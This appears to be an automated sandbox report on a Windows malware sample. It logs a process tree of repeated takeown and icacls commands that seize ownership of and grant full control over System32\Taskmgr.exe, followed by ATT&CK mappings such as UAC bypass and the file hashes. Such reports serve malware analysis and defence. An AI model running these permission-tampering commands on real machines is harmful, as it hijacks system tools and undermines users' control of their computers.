C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2132
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:3396 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1392 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4028
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1420 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4668
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4864
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:3712 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1492
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:2156
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:764 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:760
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2668 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2772
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:1840
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3940 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2340
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:208
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4844
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4424 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4052
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2932
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:2024
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3688 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3896
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:928 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4888
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5072
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:3412 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4056
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1748
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:3140 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3900 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:2820 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3180 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2972
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:1764
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5116 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4144
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4092 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:1016
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2832
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1684
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3248
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:1556 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4540
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4584
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:224 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2512 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:4200 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4280 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3348
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:2440 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:696
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1472
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:1612 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2212 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1304
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:2924 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4552 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3960
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:1688 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5036
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3496 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4000
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:1476
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1780
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2264
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4776
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3588 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3708
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1360
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:1528 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1700
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1816
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3180
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3900
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:940 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1920
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:3600 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4196
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2932
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:208
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:1684 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3940
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1876
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2156
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3712
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:916 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:1748 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1368
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:812
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3608
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4312
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:440 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4688
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Event Triggered Execution
1Change Default File Association
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
409KB
MD53cbc858be858576bc3f33a3b6efe1e0d
SHA19132db46a029e211b72ec3051164eed95c825c17
SHA25665833789350511b85774a58aed13a14d40afe72f4b513cd36366e7022d006e03
SHA512a83d5512e69b13225a5500c9204fac0db6b52e0ba750434f2848520edd9005ed8a126c4b67c950bb60b6fdbc3ae8372f3ded9c42441b54fcbadc39d9819fd1a6
-
Filesize
409KB
MD5b23232263d0ff718419df3180d3d8670
SHA1194d700b79d7ffa681aaad1fd5010d788a4713ee
SHA256ffb7153f30e4206d3e369573d4e7fd7a3c79eab77ea2cf8f631f0dea7c3d1781
SHA5127c478b9cf4556539d8cd2a9165d11558a9957f7dc9ae25bd2380c02fa01e37061b6e5717d978eae87e7b074524b390d7f6a78d238240e3e1ffc45a259227c553